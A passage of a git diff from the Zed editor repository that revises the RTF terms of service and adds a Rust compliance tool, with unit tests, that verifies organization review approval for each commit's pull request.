for changes. Revisions will be effective immediately except that, for existing users, material revisions will be effective 30 days after posting or notice to Customer of the revisions unless otherwise stated. Zed may require that Customer\u160 ?accept modified Terms in order to continue to use the Service. 
If Customer does not agree to the modified Terms, then Customer should discontinue its use of the Service and notify Zed at hi@zed.dev, in which case Zed will provide a pro-rated refund of any prepaid Subscription Fee. The terms in any Customer purchase order or business form will not amend or modify the Terms and are expressly rejected by Zed; any of these Customer documents are for administrative purposes only and have no legal effect with respect to the Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.5. Subcontractors\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Zed may use subcontractors and permit them to exercise Zed\u8217's rights, but Zed remains responsible for their compliance with the Terms and for its overall performance under the Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.6. Independent Contractors\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Parties are independent contractors, not agents, partners, or joint venturers.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.7. Export\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u160 ?will comply with all relevant U.S. and foreign export and import Laws in using the Service. Customer: (a) represents and warrants that it is not listed on any U.S. government list of prohibited or restricted parties or located in (or a national of) a country that is subject to a U.S. government embargo or that has been designated by the U.S. government as a \u8220"terrorist supporting\u8221" country; (b) agrees not to access or use the Service in violation of any U.S. export embargo, prohibition, or restriction; and (c) will not submit to the Service any information controlled under the U.S. International Traffic in Arms Regulations.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.8. Government End-Users\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Elements of the Service may include commercial computer software. 
If the user or licensee of the Service is an agency, department, or other entity of the United States Government, the use, duplication, reproduction, release, modification, disclosure, or transfer of the Service or any related documentation of any kind, including technical data and manuals, is restricted by the terms of the Terms in accordance with Federal Acquisition Regulation 12.212 for civilian purposes and Defense Federal Acquisition Regulation Supplement 227.7202 for military purposes. The Service was developed fully at private expense. All other use is prohibited.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.9. Privacy Policy\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Please read the {\field{\*\fldinst{HYPERLINK "/privacy-policy"}}{\fldrslt{\ul +Zed Privacy Policy +}}} + (the \u8220"{\b Privacy Policy}\u8221") carefully for information relating to our collection, use, storage, and disclosure of your personal information. The Zed Privacy Policy is incorporated by this reference into, and made a part of, these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.10. Additional Terms\par} +{\pard \ql \f0 \sa180 \li0 \fi0 Customer\u8217's use of the Service is subject to all additional terms, policies, rules, or guidelines applicable to the Service or certain features of the Service that we may post on or link to from the Service (the \u8220"{\b Additional Terms}\u8221"). All Additional Terms are incorporated by this reference into, and made a part of, these Terms.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.11. Consent to Electronic Communications\par} +{\pard \ql \f0 \sa180 \li0 \fi0 By using the Service, Customer consents to receiving certain electronic communications from Zed as further described in the Privacy Policy. Please read the Privacy Policy to learn more about Zed\u8217's electronic communications practices. 
Customer agrees that any notices, agreements, disclosures, or other communications that Zed sends to Customer electronically will satisfy any legal communication requirements, including that those communications be in writing. Zed may send Customer emails concerning Zed products and services, as well as those of third parties. Customer\u160 ?may opt out of promotional emails by following the unsubscribe instructions in the promotional email itself.\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.12. Contact Information\par} +{\pard \ql \f0 \sa180 \li0 \fi0 The Service is offered by Zed Industries, Inc. Customer\u160 ?may contact Zed by sending correspondence to 2590 Welton Street, Suite 200, PMB 1916, Denver, CO 80205 with cc: to {\field{\*\fldinst{HYPERLINK "mailto:legal@zed.dev"}}{\fldrslt{\ul +legal@zed.dev }}} .\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 4. FEE BASED SERVICES, FEES AND PAYMENT TERMS\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.1. Fee Based Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The Zed AI Services is made available with additional usage benefits (the \u8220"Enhanced Use \u8221") as described in the table published at {\field{\*\fldinst{HYPERLINK "https://zed.dev/pricing"}}{\fldrslt{\ul -zed.dev/pricing -}}} - (the \u8220"Pricing Table\u8221"), subject to the requirements and limitations set forth in the Pricing Table and these Terms. In order to make use of the Enhanced Use, Customer must access the Zed AI Services through a Zed registered account.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.2. Fees\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer shall pay to Zed the applicable fees set forth in Pricing Table, together with any applicable taxes and shipping and handling (collectively, the \u8220"Fees\u8221"). Customer shall have no right of return, and all Fees shall be non-refundable.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.3. 
Payment Terms\par} -{\pard \ql \f0 \sa180 \li0 \fi0 All amounts payable to Zed under this Agreement shall be paid in United States dollars and paid Zed according to the method of payment, frequency and calculated as set forth in the Pricing Table.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 4.4. Taxes; Set-offs\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Any and all payments made by Customer in accordance with this Agreement are exclusive of any taxes that might be assessed by any jurisdiction. Customer shall pay or reimburse Zed for all sales, use, property and similar taxes; all customs duties, import fees, stamp duties, license fees and similar charges; and all other mandatory payments to government agencies of whatever kind, except taxes imposed on the net or gross income of Zed. All amounts payable to Zed under this Agreement shall be without set-off and without deduction of any taxes, levies, imposts, charges, withholdings and/or duties of any nature which may be levied or imposed, including without limitation, value added tax, customs duty and withholding tax.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 5. TERM AND TERMINATION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.1. Term\par} -{\pard \ql \f0 \sa180 \li0 \fi0 The term of this Agreement shall commence on the date You first download the Editor or use the Zed Service (the "Effective Date"), and unless terminated earlier according to this Section 3, will end pursuant to this Section 5 (the "Term").\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.2. Termination\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement may be terminated: (a) by either party if the other has materially breached this Agreement; or (b) by Zed at any time and for any reason upon notice to Customer. 
You acknowledge that Zed is under no obligation to continue to operate the Zed Service or make the Editor available, and We may end any programs in connection with the same at any time.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 5.3. Effect of Termination and Survival\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Upon any expiration or termination of this Agreement, Customer shall (i) immediately cease use of the Zed Service, and (ii) return all Zed Confidential Information and other materials provided by Zed. The following provisions will survive termination of this Agreement: Sections 3.3 (Customer Data), Section 3.4 (Privacy Policy), Section 5.3 (Effect of Termination and Survival), Section 6 (Ownership), Section 7 (Indemnification), Section 9 (Limitation of Liability), Section 10 (Third Party Services), and Section 11 (Miscellaneous).\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 6. OWNERSHIP\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed retains all right, title, and interest in and to the Zed Service, Editor, and any software, products, works or other intellectual property created, used, provided, or made available by Zed under or in connection with the Zed Service or Editor. Customer may from time to time provide suggestions, comments, or other feedback to Zed with respect to the Zed Service or Editor ("Feedback"). Customer shall, and hereby does, grant to Zed a nonexclusive, worldwide, perpetual, irrevocable, transferable, sublicensable, royalty-free, fully paid-up license to use and exploit the Feedback for any purpose. You retain all right, title and interest in and to the Customer Data, including all intellectual property rights therein. No intellectual property rights with respect to any software code you develop or modify with the Editor or Zed Service (collectively, the \u8220"Output\u8221") are transferred or assigned to Zed hereunder.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 7. 
INDEMNIFICATION\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Customer will defend, indemnify, and hold Zed, its affiliates, suppliers and licensors harmless and each of their respective officers, directors, employees and representatives from and against any claims, damages, losses, liabilities, costs, and expenses (including reasonable attorneys' fees) arising out of or relating to any third party claim with respect to: (a) Customer Data; (b) breach of this Agreement or violation of applicable law by Customer; or (c) alleged infringement or misappropriation of third-party's intellectual property rights resulting from Customer Data.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 8. WARRANTY\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed does not represent or warrant that the operation of the Zed Service or Editor (or any portion thereof) will be uninterrupted or error free, or that the Zed Service or Editor (or any portion thereof) will operate in combination with other hardware, software, systems or data not provided by Zed. CUSTOMER ACKNOWLEDGES THAT, ZED MAKES NO EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES OF ANY KIND WITH RESPECT TO THE SERVICE OR SOFTWARE, OR THEIR CONDITION. ZED HEREBY EXPRESSLY EXCLUDES, ANY AND ALL OTHER EXPRESS OR IMPLIED REPRESENTATIONS OR WARRANTIES, WHETHER UNDER COMMON LAW, STATUTE OR OTHERWISE, INCLUDING WITHOUT LIMITATION ANY AND ALL WARRANTIES AS TO MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, SATISFACTORY QUALITY OR NON-INFRINGEMENT OF THIRD-PARTY RIGHTS.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 9. LIMITATIONS OF LIABILITY\par} -{\pard \ql \f0 \sa180 \li0 \fi0 IN NO EVENT SHALL ZED BE LIABLE FOR ANY LOST DATA, LOST PROFITS, BUSINESS INTERRUPTION, REPLACEMENT SERVICE OR OTHER SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR INDIRECT DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THEORY OF LIABILITY. 
ZED'S LIABILITY FOR ALL CLAIMS ARISING UNDER THIS AGREEMENT, WHETHER IN CONTRACT, TORT OR OTHERWISE, SHALL NOT EXCEED THE GREATER OF: THE FEES PAID TO ZED BY CUSTOMER DURING THE TWELVE (12) MONTH PERIOD PRECEDING THE DATE OF THE CLAIM, OR ONE THOUSAND US DOLLARS ($1,000).\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 10. Third Party Services\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed may make certain third party services available to You within the Editor or the Zed Service (each a "Third Party Service"). You acknowledge and agree that (a) use of each Third Party Service is subject to the corresponding terms and conditions available at the following URL: {\field{\*\fldinst{HYPERLINK "https://zed.dev/third-party-terms"}}{\fldrslt{\ul -https://zed.dev/third-party-terms -}}} - and/or presented in connection with Your use of such Third Party Service; (b) the terms and conditions of this Agreement do not apply with respect to Your use of any Third Party Service; and (c) Zed is not liable in any way regarding Your use of any Third Party Service.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel1 \b \fs32 11. MISCELLANEOUS\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.1. Export Control\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You hereby certify that You will comply with all current US Export Control laws. You agree to defend, indemnify and hold Zed harmless from any liability for Your violation of U.S. Export Control laws.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.2. Compliance with Laws\par} -{\pard \ql \f0 \sa180 \li0 \fi0 You shall comply with all applicable laws and regulations in its use of the Solution, including without limitation the unlawful gathering or collecting, or assisting in the gathering or collecting of information in violation of any privacy laws or regulations. 
You shall, at its own expense, defend, indemnify and hold harmless Zed from and against any and all claims, losses, liabilities, damages, judgments, government or federal sanctions, costs and expenses (including attorneys' fees) incurred by Zed arising from any claim or assertion by any third party of violation of privacy laws or regulations by You or any of its agents, officers, directors or employees.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.3. Assignment\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Neither party may transfer and assign its rights and obligations under this Agreement without the prior written consent of the other party. Notwithstanding the foregoing, Zed may transfer and assign its rights under this Agreement without consent from the other party in connection with a change in control, acquisition or sale of all or substantially all of its assets.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.4. Force Majeure\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Neither party shall be responsible for failure or delay in performance by events out of their reasonable control, including but not limited to, acts of God, Internet outage, terrorism, war, fires, earthquakes and other disasters (each a "Force Majeure"). Notwithstanding the foregoing: if a Force Majeure continues for more than thirty (30) days, either party may to terminate this agreement by written notice to the other party.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.5. Notice\par} -{\pard \ql \f0 \sa180 \li0 \fi0 All notices between the parties shall be in writing and shall be deemed to have been given if personally delivered or sent by registered or certified mail (return receipt), or by recognized courier service.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.6. No Agency\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Both parties agree that no agency, partnership, joint venture, or employment is created as a result of this Agreement. 
You do not have any authority of any kind to bind Zed.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.7. Governing Law\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement shall be governed exclusively by, and construed exclusively in accordance with, the laws of the United States and the State of California, without regard to its conflict of laws provisions. The federal courts of the United States in the Northern District of California and the state courts of the State of California shall have exclusive jurisdiction to adjudicate any dispute arising out of or relating to this Agreement. Each party hereby consents to the jurisdiction of such courts and waives any right it may otherwise have to challenge the appropriateness of such forums, whether on the basis of the doctrine of forum non conveniens or otherwise. The United Nations Convention on Contracts for the International Sale of Goods shall not apply to this Agreement or any Purchase Order issued under this Agreement.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.8. Updated Agreement\par} -{\pard \ql \f0 \sa180 \li0 \fi0 Zed reserves the right to update this Agreement at any time. The terms and conditions of the updated version of the Agreement shall apply to the Zed Service and Editor downloaded, or accessed following the date of publication of the updated version. If You do not agree with any terms of the updated Agreement, You may not use or access the Zed Service or Editor in any manner. Zed may from time-to-time provide release notes applicable to the Editor or Zed Service, and such release notes may contain additional use restrictions or terms applicable to Customer Data. Your use of the Editor or Zed Service after the applicable release notes are made available shall be subject to the additional use restrictions or terms applicable to Customer Data.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 11.9. 
Entire Agreement\par} -{\pard \ql \f0 \sa180 \li0 \fi0 This Agreement is the complete and exclusive statement of the mutual understanding of the parties and supersedes and cancels all previous written and oral agreements, communications, and other understandings relating to the subject matter of this Agreement, and all waivers and modifications must be in a writing signed by both parties, except as otherwise provided herein. Any term or provision of this Agreement held to be illegal or unenforceable shall be, to the fullest extent possible, interpreted so as to be construed as valid, but in any event the validity or enforceability of the remainder hereof shall not be affected.\par} -{\pard \ql \f0 \sa180 \li0 \fi0 {\b DATE: May 6, 2025}\par} +{\pard \ql \f0 \sa180 \li0 \fi0 \outlinelevel2 \b \fs28 16.13. Notice to California Residents\par} +{\pard \ql \f0 \sa180 \li0 \fi0 If Customer is a California resident, then under California Civil Code Section\u160 ?1789.3, Customer may contact the Complaint Assistance Unit of the Division of Consumer Services of the California Department of Consumer Affairs in writing at 1625 N. 
Market Blvd., Suite N 112, Sacramento, California 95834, or by telephone at +1-800-952-5210 in order to resolve a complaint regarding the Service or to receive further information regarding use of the Service.\par} } diff --git a/tooling/compliance/Cargo.toml b/tooling/compliance/Cargo.toml new file mode 100644 index 0000000000000000000000000000000000000000..9b1ade359daa4b7a02beff861c94e01fff071f84 --- /dev/null +++ b/tooling/compliance/Cargo.toml @@ -0,0 +1,38 @@ +[package] +name = "compliance" +version = "0.1.0" +edition.workspace = true +publish.workspace = true +license = "GPL-3.0-or-later" + +[lints] +workspace = true + +[features] +octo-client = ["dep:octocrab", "dep:jsonwebtoken", "dep:futures", "dep:tokio"] + +[dependencies] +anyhow.workspace = true +async-trait.workspace = true +derive_more.workspace = true +futures = { workspace = true, optional = true } +itertools.workspace = true +jsonwebtoken = { version = "10.2", features = ["use_pem"], optional = true } +octocrab = { version = "0.49", default-features = false, features = [ + "default-client", + "jwt-aws-lc-rs", + "retry", + "rustls", + "rustls-aws-lc-rs", + "stream", + "timeout" +], optional = true } +regex.workspace = true +semver.workspace = true +serde.workspace = true +serde_json.workspace = true +tokio = { workspace = true, optional = true } + +[dev-dependencies] +indoc.workspace = true +tokio = { workspace = true, features = ["rt", "macros"] } diff --git a/tooling/compliance/LICENSE-GPL b/tooling/compliance/LICENSE-GPL new file mode 120000 index 0000000000000000000000000000000000000000..89e542f750cd3860a0598eff0dc34b56d7336dc4 --- /dev/null +++ b/tooling/compliance/LICENSE-GPL @@ -0,0 +1 @@ +../../LICENSE-GPL \ No newline at end of file diff --git a/tooling/compliance/src/checks.rs b/tooling/compliance/src/checks.rs new file mode 100644 index 0000000000000000000000000000000000000000..a0623fbbbc179edf9f5b6d777b3116ff498f0265 --- /dev/null +++ b/tooling/compliance/src/checks.rs @@ -0,0 +1,647 @@ 
+use std::{fmt, ops::Not as _}; + +use itertools::Itertools as _; + +use crate::{ + git::{CommitDetails, CommitList}, + github::{ + CommitAuthor, GitHubClient, GitHubUser, GithubLogin, PullRequestComment, PullRequestData, + PullRequestReview, ReviewState, + }, + report::Report, +}; + +const ZED_ZIPPY_COMMENT_APPROVAL_PATTERN: &str = "@zed-zippy approve"; +const ZED_ZIPPY_GROUP_APPROVAL: &str = "@zed-industries/approved"; + +#[derive(Debug)] +pub enum ReviewSuccess { + ApprovingComment(Vec), + CoAuthored(Vec), + ExternalMergedContribution { merged_by: GitHubUser }, + PullRequestReviewed(Vec), +} + +impl ReviewSuccess { + pub(crate) fn reviewers(&self) -> anyhow::Result { + let reviewers = match self { + Self::CoAuthored(authors) => authors.iter().map(ToString::to_string).collect_vec(), + Self::PullRequestReviewed(reviews) => reviews + .iter() + .filter_map(|review| review.user.as_ref()) + .map(|user| format!("@{}", user.login)) + .collect_vec(), + Self::ApprovingComment(comments) => comments + .iter() + .map(|comment| format!("@{}", comment.user.login)) + .collect_vec(), + Self::ExternalMergedContribution { merged_by } => { + vec![format!("@{}", merged_by.login)] + } + }; + + let reviewers = reviewers.into_iter().unique().collect_vec(); + + reviewers + .is_empty() + .not() + .then(|| reviewers.join(", ")) + .ok_or_else(|| anyhow::anyhow!("Expected at least one reviewer")) + } +} + +impl fmt::Display for ReviewSuccess { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::CoAuthored(_) => formatter.write_str("Co-authored by an organization member"), + Self::PullRequestReviewed(_) => { + formatter.write_str("Approved by an organization review") + } + Self::ApprovingComment(_) => { + formatter.write_str("Approved by an organization approval comment") + } + Self::ExternalMergedContribution { .. 
} => { + formatter.write_str("External merged contribution") + } + } + } +} + +#[derive(Debug)] +pub enum ReviewFailure { + // todo: We could still query the GitHub API here to search for one + NoPullRequestFound, + Unreviewed, + UnableToDetermineReviewer, + Other(anyhow::Error), +} + +impl fmt::Display for ReviewFailure { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self { + Self::NoPullRequestFound => formatter.write_str("No pull request found"), + Self::Unreviewed => formatter + .write_str("No qualifying organization approval found for the pull request"), + Self::UnableToDetermineReviewer => formatter.write_str("Could not determine reviewer"), + Self::Other(error) => write!(formatter, "Failed to inspect review state: {error}"), + } + } +} + +pub(crate) type ReviewResult = Result; + +impl> From for ReviewFailure { + fn from(err: E) -> Self { + Self::Other(anyhow::anyhow!(err)) + } +} + +pub struct Reporter<'a> { + commits: CommitList, + github_client: &'a GitHubClient, +} + +impl<'a> Reporter<'a> { + pub fn new(commits: CommitList, github_client: &'a GitHubClient) -> Self { + Self { + commits, + github_client, + } + } + + /// Method that checks every commit for compliance + async fn check_commit(&self, commit: &CommitDetails) -> Result { + let Some(pr_number) = commit.pr_number() else { + return Err(ReviewFailure::NoPullRequestFound); + }; + + let pull_request = self.github_client.get_pull_request(pr_number).await?; + + if let Some(approval) = self.check_pull_request_approved(&pull_request).await? { + return Ok(approval); + } + + if let Some(approval) = self + .check_approving_pull_request_comment(&pull_request) + .await? + { + return Ok(approval); + } + + if let Some(approval) = self.check_commit_co_authors(commit).await? { + return Ok(approval); + } + + // if let Some(approval) = self.check_external_merged_pr(pr_number).await? 
{ + // return Ok(approval); + // } + + Err(ReviewFailure::Unreviewed) + } + + async fn check_commit_co_authors( + &self, + commit: &CommitDetails, + ) -> Result, ReviewFailure> { + if commit.co_authors().is_some() + && let Some(commit_authors) = self + .github_client + .get_commit_authors([commit.sha()]) + .await? + .get(commit.sha()) + .and_then(|authors| authors.co_authors()) + { + let mut org_co_authors = Vec::new(); + for co_author in commit_authors { + if let Some(github_login) = co_author.user() + && self + .github_client + .check_org_membership(github_login) + .await? + { + org_co_authors.push(co_author.clone()); + } + } + + Ok(org_co_authors + .is_empty() + .not() + .then_some(ReviewSuccess::CoAuthored(org_co_authors))) + } else { + Ok(None) + } + } + + #[allow(unused)] + async fn check_external_merged_pr( + &self, + pull_request: PullRequestData, + ) -> Result, ReviewFailure> { + if let Some(user) = pull_request.user + && self + .github_client + .check_org_membership(&GithubLogin::new(user.login)) + .await? + .not() + { + pull_request.merged_by.map_or( + Err(ReviewFailure::UnableToDetermineReviewer), + |merged_by| { + Ok(Some(ReviewSuccess::ExternalMergedContribution { + merged_by, + })) + }, + ) + } else { + Ok(None) + } + } + + async fn check_pull_request_approved( + &self, + pull_request: &PullRequestData, + ) -> Result, ReviewFailure> { + let pr_reviews = self + .github_client + .get_pull_request_reviews(pull_request.number) + .await?; + + if !pr_reviews.is_empty() { + let mut org_approving_reviews = Vec::new(); + for review in pr_reviews { + if let Some(github_login) = review.user.as_ref() + && pull_request + .user + .as_ref() + .is_none_or(|pr_user| pr_user.login != github_login.login) + && review + .state + .is_some_and(|state| state == ReviewState::Approved) + && self + .github_client + .check_org_membership(&GithubLogin::new(github_login.login.clone())) + .await? 
+ { + org_approving_reviews.push(review); + } + } + + Ok(org_approving_reviews + .is_empty() + .not() + .then_some(ReviewSuccess::PullRequestReviewed(org_approving_reviews))) + } else { + Ok(None) + } + } + + async fn check_approving_pull_request_comment( + &self, + pull_request: &PullRequestData, + ) -> Result, ReviewFailure> { + let other_comments = self + .github_client + .get_pull_request_comments(pull_request.number) + .await?; + + if !other_comments.is_empty() { + let mut org_approving_comments = Vec::new(); + + for comment in other_comments { + if pull_request + .user + .as_ref() + .is_some_and(|pr_author| pr_author.login != comment.user.login) + && comment.body.as_ref().is_some_and(|body| { + body.contains(ZED_ZIPPY_COMMENT_APPROVAL_PATTERN) + || body.contains(ZED_ZIPPY_GROUP_APPROVAL) + }) + && self + .github_client + .check_org_membership(&GithubLogin::new(comment.user.login.clone())) + .await? + { + org_approving_comments.push(comment); + } + } + + Ok(org_approving_comments + .is_empty() + .not() + .then_some(ReviewSuccess::ApprovingComment(org_approving_comments))) + } else { + Ok(None) + } + } + + pub async fn generate_report(mut self) -> anyhow::Result { + let mut report = Report::new(); + + let commits_to_check = std::mem::take(&mut self.commits); + let total_commits = commits_to_check.len(); + + for (i, commit) in commits_to_check.into_iter().enumerate() { + println!( + "Checking commit {:?} ({current}/{total})", + commit.sha().short(), + current = i + 1, + total = total_commits + ); + + let review_result = self.check_commit(&commit).await; + + if let Err(err) = &review_result { + println!("Commit {:?} failed review: {:?}", commit.sha().short(), err); + } + + report.add(commit, review_result); + } + + Ok(report) + } +} + +#[cfg(test)] +mod tests { + use std::rc::Rc; + use std::str::FromStr; + + use crate::git::{CommitDetails, CommitList, CommitSha}; + use crate::github::{ + AuthorsForCommits, GitHubApiClient, GitHubClient, GitHubUser, GithubLogin, + 
PullRequestComment, PullRequestData, PullRequestReview, ReviewState, + }; + + use super::{Reporter, ReviewFailure, ReviewSuccess}; + + struct MockGitHubApi { + pull_request: PullRequestData, + reviews: Vec, + comments: Vec, + commit_authors_json: serde_json::Value, + org_members: Vec, + } + + #[async_trait::async_trait(?Send)] + impl GitHubApiClient for MockGitHubApi { + async fn get_pull_request(&self, _pr_number: u64) -> anyhow::Result { + Ok(self.pull_request.clone()) + } + + async fn get_pull_request_reviews( + &self, + _pr_number: u64, + ) -> anyhow::Result> { + Ok(self.reviews.clone()) + } + + async fn get_pull_request_comments( + &self, + _pr_number: u64, + ) -> anyhow::Result> { + Ok(self.comments.clone()) + } + + async fn get_commit_authors( + &self, + _commit_shas: &[&CommitSha], + ) -> anyhow::Result { + serde_json::from_value(self.commit_authors_json.clone()).map_err(Into::into) + } + + async fn check_org_membership(&self, login: &GithubLogin) -> anyhow::Result { + Ok(self + .org_members + .iter() + .any(|member| member == login.as_str())) + } + + async fn ensure_pull_request_has_label( + &self, + _label: &str, + _pr_number: u64, + ) -> anyhow::Result<()> { + Ok(()) + } + } + + fn make_commit( + sha: &str, + author_name: &str, + author_email: &str, + title: &str, + body: &str, + ) -> CommitDetails { + let formatted = format!( + "{sha}|field-delimiter|{author_name}|field-delimiter|{author_email}|field-delimiter|\ + {title}|body-delimiter|{body}|commit-delimiter|" + ); + CommitList::from_str(&formatted) + .expect("test commit should parse") + .into_iter() + .next() + .expect("should have one commit") + } + + fn review(login: &str, state: ReviewState) -> PullRequestReview { + PullRequestReview { + user: Some(GitHubUser { + login: login.to_owned(), + }), + state: Some(state), + } + } + + fn comment(login: &str, body: &str) -> PullRequestComment { + PullRequestComment { + user: GitHubUser { + login: login.to_owned(), + }, + body: Some(body.to_owned()), + } + 
} + + struct TestScenario { + pull_request: PullRequestData, + reviews: Vec, + comments: Vec, + commit_authors_json: serde_json::Value, + org_members: Vec, + commit: CommitDetails, + } + + impl TestScenario { + fn single_commit() -> Self { + Self { + pull_request: PullRequestData { + number: 1234, + user: Some(GitHubUser { + login: "alice".to_owned(), + }), + merged_by: None, + }, + reviews: vec![], + comments: vec![], + commit_authors_json: serde_json::json!({}), + org_members: vec![], + commit: make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing (#1234)", + "", + ), + } + } + + fn with_reviews(mut self, reviews: Vec) -> Self { + self.reviews = reviews; + self + } + + fn with_comments(mut self, comments: Vec) -> Self { + self.comments = comments; + self + } + + fn with_org_members(mut self, members: Vec<&str>) -> Self { + self.org_members = members.into_iter().map(str::to_owned).collect(); + self + } + + fn with_commit_authors_json(mut self, json: serde_json::Value) -> Self { + self.commit_authors_json = json; + self + } + + fn with_commit(mut self, commit: CommitDetails) -> Self { + self.commit = commit; + self + } + + async fn run_scenario(self) -> Result { + let mock = MockGitHubApi { + pull_request: self.pull_request, + reviews: self.reviews, + comments: self.comments, + commit_authors_json: self.commit_authors_json, + org_members: self.org_members, + }; + let client = GitHubClient::new(Rc::new(mock)); + let reporter = Reporter::new(CommitList::default(), &client); + reporter.check_commit(&self.commit).await + } + } + + #[tokio::test] + async fn approved_review_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::PullRequestReviewed(_)))); + } + + #[tokio::test] + async fn non_approved_review_state_is_not_accepted() { + let result = 
TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Other)]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn review_by_non_org_member_is_not_accepted() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn pr_author_own_approval_review_is_rejected() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("alice", ReviewState::Approved)]) + .with_org_members(vec!["alice"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn pr_author_own_approval_comment_is_rejected() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("alice", "@zed-zippy approve")]) + .with_org_members(vec!["alice"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn approval_comment_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-zippy approve")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn group_approval_comment_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-industries/approved")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn comment_without_approval_pattern_is_not_accepted() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "looks good")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + 
